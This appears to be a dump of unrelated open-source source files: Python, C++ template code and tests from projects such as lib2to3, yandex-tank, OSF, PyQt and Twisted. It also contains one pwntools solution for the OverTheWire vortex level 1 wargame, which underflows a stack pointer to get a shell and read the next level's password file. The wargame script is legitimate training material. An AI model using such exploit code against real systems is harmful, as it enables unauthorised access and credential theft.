if (!str)
handle_conversion_error(py_obj,"%(cpp_struct)s", name);
// work on this error reporting...
//std::cout << "in:" << name << " " py_obj << std::endl;
if (SWIG_GetPtr(str,(void **) &cpp_ptr,"_%(cpp_struct)s_p"))
{
handle_conversion_error(py_obj,"%(cpp_struct)s", name);
}
//std::cout << "out:" << name << " " << str << std::endl;
return cpp_ptr;
}
static %(cpp_struct)s* py_to_%(cpp_clean_struct)s(PyObject* py_obj,char* name)
{
%(cpp_struct)s *cpp_ptr;
char* str = PyString_AsString(py_obj);
if (!str)
handle_conversion_error(py_obj,"%(cpp_struct)s", name);
// work on this error reporting...
if (SWIG_GetPtr(str,(void **) &cpp_ptr,"_%(cpp_struct)s_p"))
{
handle_conversion_error(py_obj,"%(cpp_struct)s", name);
}
return cpp_ptr;
}
std::string %(cpp_clean_struct)s_to_py( %(cpp_struct)s* cpp_ptr)
{
char ptr_string[%(ptr_string_len)s];
SWIG_MakePtr(ptr_string, cpp_ptr, "_%(cpp_struct)s_p");
return std::string(ptr_string);
}
"""
class cpp_namespace_converter(base_converter):
    """Weave type converter for namespaced C++ classes passed as SWIG
    pointer strings. Subclasses set a ``namespace`` attribute (e.g. 'ft::').

    NOTE(review): Python 2 code — relies on the ``cmp`` builtin and
    ``__cmp__`` protocol.
    """
    _build_information = [common_info.swig_info()]
    def __init__(self,class_name=None):
        self.type_name = 'unknown cpp_object'
        self.name = 'no name'
        if class_name:
            # customize support_code for whatever type I was handed.
            # Turn the C++ name into a valid C identifier for function names.
            clean_name = class_name.replace('::','_')
            clean_name = clean_name.replace('<','_')
            clean_name = clean_name.replace('>','_')
            clean_name = clean_name.replace(' ','_')
            # should be enough for 64 bit machines
            str_len = len(clean_name) + 20
            vals = {'cpp_struct': class_name,
                    'cpp_clean_struct': clean_name,
                    'ptr_string_len': str_len}
            specialized_support = cpp_support_template % vals
            custom = base_info.base_info()
            custom._support_code = [specialized_support]
            self._build_information = self._build_information + [custom]
            self.type_name = class_name
    def type_match(self,value):
        """Return 1 if *value* is a SWIG pointer string in our namespace."""
        try:
            # SWIG pointer strings look like '_<addr>_<typename>_p'.
            cpp_ident = value.split('_')[2]
            if self.namespace in cpp_ident:
                return 1
        except:
            pass
        return 0
    def type_spec(self,name,value):
        # factory
        # Build a converter specialized to the class named in *value*.
        ptr_fields = value.split('_')
        class_name = '_'.join(ptr_fields[2:-1])
        new_spec = self.__class__(class_name)
        new_spec.name = name
        return new_spec
    def declaration_code(self,inline=0):
        """Return the C++ declaration that unwraps the Python argument."""
        type = self.type_name
        clean_type = type.replace('::','_')
        name = self.name
        var_name = self.retrieve_py_variable(inline)
        template = '%(type)s *%(name)s = '\
                   'convert_to_%(clean_type)s(%(var_name)s,"%(name)s");\n'
        code = template % locals()
        return code
    def __repr__(self):
        msg = "(%s:: name: %s)" % (self.type_name,self.name)
        return msg
    def __cmp__(self,other):
        #only works for equal
        return cmp(self.name,other.name) or \
               cmp(self.__class__, other.__class__) or \
               cmp(self.type_name,other.type_name)
| bsd-3-clause |
pleaseproject/python-for-android | python3-alpha/python3-src/Lib/lib2to3/fixes/fix_map.py | 170 | 3058 | # Copyright 2007 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Fixer that changes map(F, ...) into list(map(F, ...)) unless there
exists a 'from future_builtins import map' statement in the top-level
namespace.
As a special case, map(None, X) is changed into list(X). (This is
necessary because the semantics are changed in this case -- the new
map(None, X) is equivalent to [(x,) for x in X].)
We avoid the transformation (except for the special case mentioned
above) if the map() call is directly contained in iter(<>), list(<>),
tuple(<>), sorted(<>), ...join(<>), or for V in <>:.
NOTE: This is still not correct if the original code was depending on
map(F, X, Y, ...) to go on until the longest argument is exhausted,
substituting None for missing values -- like zip(), it now stops as
soon as the shortest argument is exhausted.
"""
# Local imports
from ..pgen2 import token
from .. import fixer_base
from ..fixer_util import Name, Call, ListComp, in_special_context
from ..pygram import python_symbols as syms
class FixMap(fixer_base.ConditionalFix):
    """2to3 fixer wrapping map() calls (see module docstring for the rules)."""
    BM_compatible = True
    # Three alternatives: map(None, X), map(lambda ...: ..., it), generic map.
    PATTERN = """
    map_none=power<
        'map'
        trailer< '(' arglist< 'None' ',' arg=any [','] > ')' >
    >
    |
    map_lambda=power<
        'map'
        trailer<
            '('
            arglist<
                lambdef< 'lambda'
                         (fp=NAME | vfpdef< '(' fp=NAME ')'> ) ':' xp=any
                >
                ','
                it=any
            >
            ')'
        >
    >
    |
    power<
        'map' trailer< '(' [arglist=any] ')' >
    >
    """

    # Skip the transformation entirely if this future import is present.
    skip_on = 'future_builtins.map'

    def transform(self, node, results):
        if self.should_skip(node):
            return

        if node.parent.type == syms.simple_stmt:
            # map() as a bare statement was used for side effects only.
            self.warning(node, "You should use a for loop here")
            new = node.clone()
            new.prefix = ""
            new = Call(Name("list"), [new])
        elif "map_lambda" in results:
            # map(lambda v: expr, it)  ->  [expr for v in it]
            new = ListComp(results["xp"].clone(),
                           results["fp"].clone(),
                           results["it"].clone())
        else:
            if "map_none" in results:
                # map(None, X)  ->  list(X)
                new = results["arg"].clone()
            else:
                if "arglist" in results:
                    args = results["arglist"]
                    if args.type == syms.arglist and \
                       args.children[0].type == token.NAME and \
                       args.children[0].value == "None":
                        # map(None, X, Y, ...) changed semantics in Py3.
                        self.warning(node, "cannot convert map(None, ...) "
                                     "with multiple arguments because map() "
                                     "now truncates to the shortest sequence")
                        return
                if in_special_context(node):
                    # Already consumed by iter()/list()/for/etc.: leave as-is.
                    return None
                new = node.clone()
                new.prefix = ""
                new = Call(Name("list"), [new])
        new.prefix = node.prefix
        return new
| apache-2.0 |
HackerTool/pwntools-write-ups | wargames/overthewire-vortex/level1/win.py | 4 | 1093 | #!/usr/bin/env python2
from pwn import *
import time
# Connection parameters for the OverTheWire vortex level 1 challenge.
level = 1
host = 'vortex.labs.overthewire.org'
user = 'vortex%i' % level
chal = 'vortex%i' % level
password = args['PASSWORD']
passfile = '/etc/vortex_pass/vortex%i' % (level+1)
binary = '/vortex/%s' % chal
# SSH in as the current level's user and start the vulnerable binary.
shell = ssh(host=host, user=user, password=password)
r = shell.run(binary)
# Stack layout looks like this:
# -00000214 ptr             dd ?
# -00000210 char            dd ?
# -0000020C buffer          db 512 dup(?)
#
# We start out in the middle of buffer
off_buffer = -0x20c
off_ptr    = -0x214
ptr        = off_buffer+0x100
# Each '\\' moves the write pointer backward; walk it onto ptr's high byte.
r.send('\\' * (ptr-off_ptr-3)) # Underflow PTR, -3 so we set the high byte.
r.send('\xca') # Write the byte
r.send('\\') # Move backward again to undo the ++
r.send('\xca') # Send any byte at all, triggers e()
r.clean()
time.sleep(1)
# Win
# e() gave us a shell; use it to read the next level's password.
r.send('id\n')
log.success('id: %s' % r.recv().strip())
r.send('cat /etc/vortex_pass/vortex2\n')
password = r.recv().strip()
log.success('Password: %s' % password)
print password
| mit |
fomars/yandex-tank | yandextank/plugins/Telegraf/tests/test_config.py | 3 | 3741 | from yandextank.plugins.Telegraf.config import ConfigManager, AgentConfig
import sys
if sys.version_info[0] < 3:
from ConfigParser import ConfigParser
else:
from configparser import ConfigParser
class TestConfigManager(object):
    """Unit tests for ConfigManager XML parsing and host-config extraction."""

    def test_rawxml_parse(self):
        """ raw xml read from string """
        manager = ConfigManager()
        config = """
        <Monitoring>
        <Host>
        <CPU feature="passed"/>
        </Host>
        </Monitoring>
        """
        etree = manager.parse_xml(config)
        first_host = etree.findall('Host')[0]
        assert first_host[0].tag == 'CPU'

    def test_xml_old_parse(self):
        """ old-style monitoring xml parse """
        manager = ConfigManager()
        host_configs = manager.getconfig(
            'yandextank/plugins/Telegraf/tests/old_mon.xml', 'sometargethint')
        first = host_configs[0]
        assert first['host'] == 'somehost.yandex.tld'
        assert first['host_config']['CPU']['name'] == '[inputs.cpu]'

    def test_xml_telegraf_parse(self):
        """ telegraf-style monitoring xml parse """
        manager = ConfigManager()
        host_configs = manager.getconfig(
            'yandextank/plugins/Telegraf/tests/telegraf_mon.xml',
            'sometargethint')
        first = host_configs[0]
        assert first['host'] == 'somehost.yandex.tld'
        assert first['host_config']['CPU']['name'] == '[inputs.cpu]'

    def test_target_hint(self):
        """ test target hint (special address=[target] option) """
        manager = ConfigManager()
        host_configs = manager.getconfig(
            'yandextank/plugins/Telegraf/tests/target_hint.xml',
            'somehost.yandex.tld')
        assert host_configs[0]['host'] == 'somehost.yandex.tld'
class TestAgentConfig(object):
    """Unit tests for AgentConfig file generation."""
    def test_create_startup_configs(self):
        """ test agent config creates startup config """
        manager = ConfigManager()
        telegraf_configs = manager.getconfig(
            'yandextank/plugins/Telegraf/tests/telegraf_mon.xml',
            'sometargethint')
        agent_config = AgentConfig(telegraf_configs[0], False)
        startup = agent_config.create_startup_config()
        cfg_parser = ConfigParser()
        cfg_parser.read(startup)
        assert cfg_parser.has_section('startup')
    def test_create_collector_configs(self):
        """ test agent config creates collector config """
        manager = ConfigManager()
        telegraf_configs = manager.getconfig(
            'yandextank/plugins/Telegraf/tests/telegraf_mon.xml',
            'sometargethint')
        agent_config = AgentConfig(telegraf_configs[0], False)
        remote_workdir = '/path/to/workdir/temp'
        collector_config = agent_config.create_collector_config(remote_workdir)
        cfg_parser = ConfigParser()
        cfg_parser.read(collector_config)
        # The generated telegraf config must point its file output at the
        # monitoring.rawdata file inside the remote working directory.
        assert (
            cfg_parser.has_section('agent')
            and cfg_parser.get('agent', 'interval') == "'1s'"
            and cfg_parser.has_section('[outputs.file')
            and cfg_parser.get('[outputs.file', 'files')
            == "['{rmt}/monitoring.rawdata']".format(rmt=remote_workdir))
    def test_create_custom_exec_script(self):
        """ test agent config creates custom_exec config """
        manager = ConfigManager()
        telegraf_configs = manager.getconfig(
            'yandextank/plugins/Telegraf/tests/telegraf_mon.xml',
            'sometargethint')
        agent_config = AgentConfig(telegraf_configs[0], False)
        custom_exec_config = agent_config.create_custom_exec_script()
        with open(custom_exec_config, 'r') as custom_fname:
            data = custom_fname.read()
        # The generated shell script must contain the configured curl probe.
        assert (data.find("-0) curl -s 'http://localhost:6100/stat'") != -1)
| lgpl-2.1 |
jasper1918/bioconda-recipes | recipes/mz_to_sqlite/mz_to_sqlite.py | 60 | 3265 | #!/usr/bin/env python
#
# Wrapper script for Java Conda packages that ensures that the java runtime
# is invoked with the right options. Adapted from the bash script (http://stackoverflow.com/questions/59895/can-a-bash-script-tell-what-directory-its-stored-in/246128#246128).
#
# Program Parameters
#
import os
import subprocess
import sys
import shutil
from os import access
from os import getenv
from os import X_OK
jar_file = 'mzToSQLite-1.2.0.jar'
default_jvm_mem_opts = ['-Xms512m', '-Xmx1g']
# !!! End of parameter section. No user-serviceable code below this line !!!
def real_dirname(path):
    """Return the symlink-resolved, canonicalized directory-portion of path."""
    resolved = os.path.realpath(path)
    return os.path.dirname(resolved)
def java_executable():
    """Return the executable name of the Java interpreter.

    Prefers $JAVA_HOME/bin/java when it exists and is executable;
    otherwise falls back to whatever 'java' resolves to on PATH.
    """
    java_home = getenv('JAVA_HOME')
    if java_home:
        candidate = os.path.join(java_home, 'bin', 'java')
        if access(candidate, X_OK):
            return candidate
    return 'java'
def jvm_opts(argv):
    """Construct lists of Java arguments based on our argument list.

    The argument list passed in argv must not include the script name.
    The return value is a 4-tuple of the form:

        (memory_options, prop_options, passthrough_options, exec_dir)

    where the first three elements are lists of strings and exec_dir is
    either None or the directory named by a '--exec_dir=' argument.
    (The previous docstring claimed a 3-tuple, which did not match the
    actual return value.)
    """
    mem_opts = []
    prop_opts = []
    pass_args = []
    exec_dir = None

    for arg in argv:
        if arg.startswith('-D') or arg.startswith('-XX'):
            # Java system properties and extended -XX options.
            prop_opts.append(arg)
        elif arg.startswith('-Xm'):
            # JVM memory options (-Xms/-Xmx).
            mem_opts.append(arg)
        elif arg.startswith('--exec_dir='):
            exec_dir = arg.split('=')[1].strip('"').strip("'")
            if not os.path.exists(exec_dir):
                # First use of this exec_dir: copy the distribution there.
                shutil.copytree(real_dirname(sys.argv[0]), exec_dir,
                                symlinks=False, ignore=None)
        else:
            pass_args.append(arg)

    # In the original shell script the test coded below read:
    #   if [ "$jvm_mem_opts" == "" ] && [ -z ${_JAVA_OPTIONS+x} ]
    # To reproduce the behaviour of the above shell code fragment
    # it is important to explicitly check for equality with None
    # in the second condition, so a null envar value counts as True!
    if mem_opts == [] and getenv('_JAVA_OPTIONS') is None:
        mem_opts = default_jvm_mem_opts

    return (mem_opts, prop_opts, pass_args, exec_dir)
def main():
    """Locate the jar and launch the JVM with the translated arguments.

    mz_to_sqlite updates files relative to the path of the jar file.
    In a multiuser setting, the option --exec_dir="exec_dir"
    can be used as the location for the peptide-shaker distribution.
    If the exec_dir does not exist,
    we copy the jar file, lib, and resources to the exec_dir directory.

    (This text used to sit as a bare string after the first statement,
    so it was silently discarded instead of becoming main.__doc__.)
    """
    java = java_executable()
    (mem_opts, prop_opts, pass_args, exec_dir) = jvm_opts(sys.argv[1:])
    jar_dir = exec_dir if exec_dir else real_dirname(sys.argv[0])

    # A first passthrough argument naming a Java package ('eu...') selects an
    # explicit main class, so invoke with -cp instead of -jar.
    if pass_args != [] and pass_args[0].startswith('eu'):
        jar_arg = '-cp'
    else:
        jar_arg = '-jar'
    jar_path = os.path.join(jar_dir, jar_file)

    java_args = [java] + mem_opts + prop_opts + [jar_arg] + [jar_path] + pass_args
    # Exit with the JVM's own exit status.
    sys.exit(subprocess.call(java_args))


if __name__ == '__main__':
    main()
| mit |
BNCrew/kernel-3.0.29 | Documentation/networking/cxacru-cf.py | 14668 | 1626 | #!/usr/bin/env python
# Copyright 2009 Simon Arlott
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 59
# Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# Usage: cxacru-cf.py < cxacru-cf.bin
# Output: values string suitable for the sysfs adsl_config attribute
#
# Warning: cxacru-cf.bin with MD5 hash cdbac2689969d5ed5d4850f117702110
# contains mis-aligned values which will stop the modem from being able
# to make a connection. If the first and last two bytes are removed then
# the values become valid, but the modulation will be forced to ANSI
# T1.413 only which may not be appropriate.
#
# The original binary format is a packed list of le32 values.
import sys
import struct
# Read packed little-endian 32-bit values from stdin and print them as
# hex-index=value pairs on one line (the sysfs adsl_config format).
i = 0
while True:
    buf = sys.stdin.read(4)
    if len(buf) == 0:
        # Clean EOF on a 4-byte boundary: all values consumed.
        break
    elif len(buf) != 4:
        # Truncated trailing value: terminate the output line and fail.
        sys.stdout.write("\n")
        sys.stderr.write("Error: read {0} not 4 bytes\n".format(len(buf)))
        sys.exit(1)
    if i > 0:
        # Values are space-separated; no leading space before the first.
        sys.stdout.write(" ")
    sys.stdout.write("{0:x}={1}".format(i, struct.unpack("<I", buf)[0]))
    i += 1
sys.stdout.write("\n")
| gpl-2.0 |
brunoabud/ic | imagem_cinematica.py | 1 | 2735 | #!/usr/bin/env python
# coding: latin-1
# Imagem Cinemática is a free software intended to be used as a tool for teachers
# and students. It utilizes Computer Vision techniques to extract the trajectory
# of moving objects from video data.
#
# The code contained in this project follows the Google Python Style Guide
# Revision 2.59.
# The specifics can be found at http://google.github.io/styleguide/pyguide.html
#
#
# Copyright (C) 2016 Bruno Abude Cardoso
#
# Imagem Cinemática is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Imagem Cinemática is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Module responsible for loading the main components of the application.
"""
import sys
import logging
import os
from PyQt4.QtGui import QApplication
from PyQt4.QtCore import Qt
from ic import log as ic_log
LOG = None
def create_logger():
    """Set up the logging utility, using the formatter that best matches the OS.
    """
    global LOG
    stream_handler = logging.StreamHandler()
    if sys.platform == "linux2":
        stream_handler.setFormatter(ic_log.ANSIFormatter())
    else:
        stream_handler.setFormatter(ic_log.ColorlessFormatter())
    stream_handler.setLevel(logging.DEBUG)
    # Filter out the annoying PyQt4 logging messages
    stream_handler.addFilter(ic_log.NameFilter("PyQt4"))

    root_logger = logging.getLogger()
    root_logger.addHandler(stream_handler)
    root_logger.setLevel(logging.NOTSET)

    LOG = logging.getLogger(__name__)
def main():
    """Import the GUI/engine modules, build the main window and run the app."""
    from gui import application
    from gui import main_window
    # NOTE(review): engine and plugin look unused here — presumably imported
    # for registration side effects; confirm before removing.
    from ic import engine
    from ic import plugin
    from ic import settings
    from ic import messages

    settings.change("app_path", sys.path[0])
    app = application.Application(sys.argv)
    messages.start_timer()

    mainwindow = main_window.MainWindow()
    desktop = QApplication.desktop().screen()
    mainwindow.show()
    # Snap the window to the top-left corner (compensating for the window
    # frame border) and stretch it across the full desktop width.
    mainwindow.move(mainwindow.frameGeometry().left()-mainwindow.geometry().left(), 0)
    mainwindow.resize(desktop.frameGeometry().width(), 150)
    # (Removed the unused 'bordas' frame-width computation.)
    mainwindow.filter_rack_window.move(0, mainwindow.frameGeometry().bottom())
    app.exec_()


if __name__ == "__main__":
    create_logger()
    main()
| gpl-3.0 |
CenterForOpenScience/osf.io | api_tests/taxonomies/views/test_taxonomy_list.py | 15 | 4498 | import pytest
from django.db.models import BooleanField, Case, When
from api.base.settings.defaults import API_BASE
from osf.models import Subject
from osf_tests.factories import SubjectFactory
@pytest.mark.django_db
class TestTaxonomy:
    """Tests for the read-only /taxonomies/ subject-listing endpoint."""

    # The autouse fixtures below populate the Subject table for every test:
    # two top-level subjects ('A', 'Z'), one 'Other ...' subject that must
    # sort last, and two children of 'A'.

    @pytest.fixture(autouse=True)
    def subject(self):
        return SubjectFactory(text='A')

    @pytest.fixture(autouse=True)
    def subject_other(self):
        # Subjects whose text starts with 'Other' are expected to sort last.
        return SubjectFactory(text='Other Sub')

    @pytest.fixture(autouse=True)
    def subject_a(self):
        return SubjectFactory(text='Z')

    @pytest.fixture(autouse=True)
    def subject_child_one(self, subject):
        return SubjectFactory(parent=subject)

    @pytest.fixture(autouse=True)
    def subject_child_two(self, subject):
        return SubjectFactory(parent=subject)

    @pytest.fixture()
    def subjects(self):
        # Mirror the API's ordering: non-'other' subjects alphabetically,
        # 'Other ...' entries last.
        return Subject.objects.all().annotate(is_other=Case(
            When(text__istartswith='other', then=True),
            default=False,
            output_field=BooleanField()
        )).order_by('is_other', 'text')

    @pytest.fixture()
    def url_subject_list(self):
        return '/{}taxonomies/'.format(API_BASE)

    @pytest.fixture()
    def res_subject_list(self, app, url_subject_list):
        # Full response object for the listing endpoint.
        return app.get(url_subject_list)

    @pytest.fixture()
    def data_subject_list(self, app, res_subject_list):
        # Just the JSON-API 'data' payload of the listing response.
        return res_subject_list.json['data']

    def test_taxonomy_other_ordering(self, subject_other, data_subject_list):
        # The 'Other Sub' subject must be the final entry in the listing.
        assert data_subject_list[-1]['id'] == subject_other._id

    def test_taxonomy_success(
            self, subject, subject_child_one, subject_child_two,
            subjects, res_subject_list):
        # make sure there are subjects to filter through
        assert len(subjects) > 0
        assert res_subject_list.status_code == 200
        assert res_subject_list.content_type == 'application/vnd.api+json'

    def test_taxonomy_text(self, subjects, data_subject_list):
        # The API's text values must appear in the expected order.
        for index, subject in enumerate(subjects):
            if index >= len(data_subject_list):
                break  # only iterate though first page of results
            assert data_subject_list[index]['attributes']['text'] == subject.text

    def test_taxonomy_parents(self, subjects, data_subject_list):
        # Each serialized subject must list its DB parent among its parents.
        for index, subject in enumerate(subjects):
            if index >= len(data_subject_list):
                break
            parents_ids = []
            for parent in data_subject_list[index]['attributes']['parents']:
                parents_ids.append(parent['id'])
            if subject.parent:
                assert subject.parent._id in parents_ids

    def test_taxonomy_filter_top_level(
            self, app, subject, subject_child_one,
            subject_child_two, url_subject_list):
        # filter[parents]=null must return exactly the parentless subjects.
        top_level_subjects = Subject.objects.filter(parent__isnull=True)
        top_level_url = '{}?filter[parents]=null'.format(url_subject_list)

        res = app.get(top_level_url)
        assert res.status_code == 200

        data = res.json['data']
        assert len(top_level_subjects) == len(data)
        assert len(top_level_subjects) > 0
        for subject in data:
            assert subject['attributes']['parents'] == []

    def test_taxonomy_filter_by_parent(self, app, url_subject_list, subject):
        # filter[parents]=<id> must return exactly that subject's children.
        children_subjects = Subject.objects.filter(parent__id=subject.id)
        children_url = '{}?filter[parents]={}'.format(
            url_subject_list, subject._id)

        res = app.get(children_url)
        assert res.status_code == 200

        data = res.json['data']
        assert len(children_subjects) == len(data)

        for subject_ in data:
            parents_ids = []
            for parent in subject_['attributes']['parents']:
                parents_ids.append(parent['id'])
            assert subject._id in parents_ids

    def test_is_deprecated(self, app, url_subject_list):
        # The endpoint is removed for API versions >= 2.6.
        res = app.get(
            '{}?version=2.6'.format(url_subject_list),
            expect_errors=True)
        assert res.status_code == 404

    def test_taxonomy_path(self, data_subject_list):
        # 'path' is '|'-joined: provider share_title, then the hierarchy texts.
        for item in data_subject_list:
            subj = Subject.objects.get(_id=item['id'])
            path_parts = item['attributes']['path'].split('|')
            assert path_parts[0] == subj.provider.share_title
            for index, text in enumerate(
                    [s.text for s in subj.object_hierarchy]):
                assert path_parts[index + 1] == text
| apache-2.0 |
dgsantana/arsenalsuite | cpp/lib/PyQt4/pyuic/uic/icon_cache.py | 8 | 5431 | #############################################################################
##
## Copyright (c) 2012 Riverbank Computing Limited <info@riverbankcomputing.com>
##
## This file is part of PyQt.
##
## This file may be used under the terms of the GNU General Public
## License versions 2.0 or 3.0 as published by the Free Software
## Foundation and appearing in the files LICENSE.GPL2 and LICENSE.GPL3
## included in the packaging of this file. Alternatively you may (at
## your option) use any later version of the GNU General Public
## License if such license has been publicly approved by Riverbank
## Computing Limited (or its successors, if any) and the KDE Free Qt
## Foundation. In addition, as a special exception, Riverbank gives you
## certain additional rights. These rights are described in the Riverbank
## GPL Exception version 1.1, which can be found in the file
## GPL_EXCEPTION.txt in this package.
##
## If you are unsure which license is appropriate for your use, please
## contact the sales department at sales@riverbankcomputing.com.
##
## This file is provided AS IS with NO WARRANTY OF ANY KIND, INCLUDING THE
## WARRANTY OF DESIGN, MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.
##
#############################################################################
import sys
import os.path
if sys.hexversion >= 0x03000000:
from PyQt4.uic.port_v3.as_string import as_string
else:
from PyQt4.uic.port_v2.as_string import as_string
class IconCache(object):
    """Maintain a cache of icons. If an icon is used more than once by a GUI
    then ensure that only one copy is created.
    """

    def __init__(self, object_factory, qtgui_module):
        """Initialise the cache."""
        self._object_factory = object_factory
        self._qtgui_module = qtgui_module
        self._base_dir = ''
        self._cache = []

    def set_base_dir(self, base_dir):
        """ Set the base directory to be used for all relative filenames. """
        self._base_dir = base_dir

    def get_icon(self, iconset):
        """Return an icon described by the given iconset tag."""
        # Handle a themed icon.
        theme = iconset.attrib.get('theme')
        if theme is not None:
            return self._object_factory.createQObject("QIcon.fromTheme",
                    'icon', (as_string(theme), ), is_attribute=False)

        # Handle an empty iconset property.
        if iconset.text is None:
            return None

        candidate = _IconSet(iconset, self._base_dir)

        # Reuse an equivalent icon set if one has already been created.
        for cached in self._cache:
            if cached == candidate:
                return cached.icon

        # Follow uic's naming convention: 'icon', 'icon1', 'icon2', ...
        position = len(self._cache)
        name = 'icon' if position == 0 else 'icon' + str(position)

        icon = self._object_factory.createQObject("QIcon", name, (),
                is_attribute=False)
        candidate.set_icon(icon, self._qtgui_module)
        self._cache.append(candidate)

        return candidate.icon
class _IconSet(object):
"""An icon set, ie. the mode and state and the pixmap used for each."""
def __init__(self, iconset, base_dir):
"""Initialise the icon set from an XML tag."""
# Set the pre-Qt v4.4 fallback (ie. with no roles).
self._fallback = self._file_name(iconset.text, base_dir)
self._use_fallback = True
# Parse the icon set.
self._roles = {}
for i in iconset:
file_name = i.text
if file_name is not None:
file_name = self._file_name(file_name, base_dir)
self._roles[i.tag] = file_name
self._use_fallback = False
# There is no real icon yet.
self.icon = None
@staticmethod
def _file_name(fname, base_dir):
""" Convert a relative filename if we have a base directory. """
fname = fname.replace("\\", "\\\\")
if base_dir != '' and fname[0] != ':' and not os.path.isabs(fname):
fname = os.path.join(base_dir, fname)
return fname
def set_icon(self, icon, qtgui_module):
"""Save the icon and set its attributes."""
if self._use_fallback:
icon.addFile(self._fallback)
else:
for role, pixmap in self._roles.items():
if role.endswith("off"):
mode = role[:-3]
state = qtgui_module.QIcon.Off
elif role.endswith("on"):
mode = role[:-2]
state = qtgui_module.QIcon.On
else:
continue
mode = getattr(qtgui_module.QIcon, mode.title())
if pixmap:
icon.addPixmap(qtgui_module.QPixmap(pixmap), mode, state)
else:
icon.addPixmap(qtgui_module.QPixmap(), mode, state)
self.icon = icon
def __eq__(self, other):
"""Compare two icon sets for equality."""
if not isinstance(other, type(self)):
return NotImplemented
if self._use_fallback:
if other._use_fallback:
return self._fallback == other._fallback
return False
if other._use_fallback:
return False
return self._roles == other._roles
| gpl-2.0 |
bdh1011/wau | venv/lib/python2.7/site-packages/twisted/protocols/dict.py | 11 | 10728 | # Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Dict client protocol implementation.
@author: Pavel Pergamenshchik
"""
from twisted.protocols import basic
from twisted.internet import defer, protocol
from twisted.python import log
from StringIO import StringIO
def parseParam(line):
    """Chew one dqstring or atom from beginning of line and return (param, remaningline)"""
    if line == '':
        return (None, '')

    # A parameter is either a bare atom or a double-quoted string.
    quoted = line[0] == '"'
    pos = 1 if quoted else 0
    chars = []

    while True:
        ch = line[pos] if pos < len(line) else ''
        pos += 1
        if ch == '"':
            if quoted:
                pos += 1  # skip the separating space
            return (''.join(chars), line[pos:])
        elif ch == '\\':
            if pos >= len(line):
                return (None, line)  # unexpected end of string
            # The escaped character is taken literally.
            ch = line[pos]
            pos += 1
        elif ch == '':
            if not quoted:
                return (''.join(chars), line[pos:])
            return (None, line)  # unexpected end of string
        elif ch == ' ':
            if not quoted:
                return (''.join(chars), line[pos:])
        chars.append(ch)
def makeAtom(line):
    """Munch a string into an 'atom'"""
    # FIXME: proper quoting
    # Atoms may not contain control characters/space (0-32), double quote,
    # single quote or backslash; strip those out.  The original
    # filter()/range()-concatenation idiom only behaved correctly under
    # Python 2; this form is equivalent there and also works on Python 3.
    forbidden = set(map(chr, list(range(33)) + [34, 39, 92]))
    return ''.join(c for c in line if c not in forbidden)
def makeWord(s):
    """Backslash-escape a string for use as a single word in a DICT command.

    Control characters/space (0-32), double quote, single quote and
    backslash are each preceded by a backslash.
    """
    # list(range(...)) keeps this working on Python 3 as well; the original
    # 'range(33) + [...]' concatenation is Python 2 only.
    mustquote = set(list(range(33)) + [34, 39, 92])
    result = []
    for c in s:
        if ord(c) in mustquote:
            result.append("\\")
        result.append(c)
    return "".join(result)
def parseText(line):
    """Decode one line of a textual response body.

    Returns None for the terminating '.' line; strips the leading dot from
    dot-stuffed lines; everything else passes through unchanged.
    """
    if line == '.':
        return None
    if line.startswith('..'):
        return line[1:]
    return line
class Definition:
    """A word definition"""
    def __init__(self, name, db, dbdesc, text):
        # The word being defined.
        self.name = name
        # Identifier of the database the definition came from.
        self.db = db
        # Human-readable description of that database.
        self.dbdesc = dbdesc
        self.text = text # list of strings not terminated by newline
class DictClient(basic.LineReceiver):
    """dict (RFC2229) client.

    Server replies are dispatched to dictCode_<code>_<state> methods, where
    <code> is the 3-digit response code (or the literal 'text' while a
    multi-line body is being received) and <state> is the protocol state.
    """
    data = None # multiline data
    MAX_LENGTH = 1024
    state = None
    mode = None
    result = None
    factory = None

    def __init__(self):
        self.data = None
        self.result = None

    def connectionMade(self):
        self.state = "conn"
        self.mode = "command"

    def sendLine(self, line):
        """Throw up if the line is longer than 1022 characters"""
        if len(line) > self.MAX_LENGTH - 2:
            raise ValueError("DictClient tried to send a too long line")
        basic.LineReceiver.sendLine(self, line)

    def lineReceived(self, line):
        try:
            line = line.decode("UTF-8")
        except UnicodeError: # garbage received, skip
            return
        if self.mode == "text": # we are receiving textual data
            code = "text"
        else:
            if len(line) < 4:
                log.msg("DictClient got invalid line from server -- %s" % line)
                self.protocolError("Invalid line from server")
                # Bug fix: this used to call the non-existent method
                # transport.LoseConnection() and raised AttributeError.
                self.transport.loseConnection()
                return
            # NOTE(review): a non-numeric status would raise ValueError here;
            # preserved as-is to keep behaviour unchanged.
            code = int(line[:3])
            line = line[4:]
        method = getattr(self, 'dictCode_%s_%s' % (code, self.state), self.dictCode_default)
        method(line)

    def dictCode_default(self, line):
        """Unknown message"""
        log.msg("DictClient got unexpected message from server -- %s" % line)
        self.protocolError("Unexpected server message")
        self.transport.loseConnection()

    def dictCode_221_ready(self, line):
        """We are about to get kicked off, do nothing"""
        pass

    def dictCode_220_conn(self, line):
        """Greeting message"""
        self.state = "ready"
        self.dictConnected()

    # Bug fix: the three handlers below lacked the 'line' parameter that the
    # lineReceived dispatcher always passes, so any of these server replies
    # used to raise TypeError instead of being handled.
    def dictCode_530_conn(self, line):
        self.protocolError("Access denied")
        self.transport.loseConnection()

    def dictCode_420_conn(self, line):
        self.protocolError("Server temporarily unavailable")
        self.transport.loseConnection()

    def dictCode_421_conn(self, line):
        self.protocolError("Server shutting down at operator request")
        self.transport.loseConnection()

    def sendDefine(self, database, word):
        """Send a dict DEFINE command"""
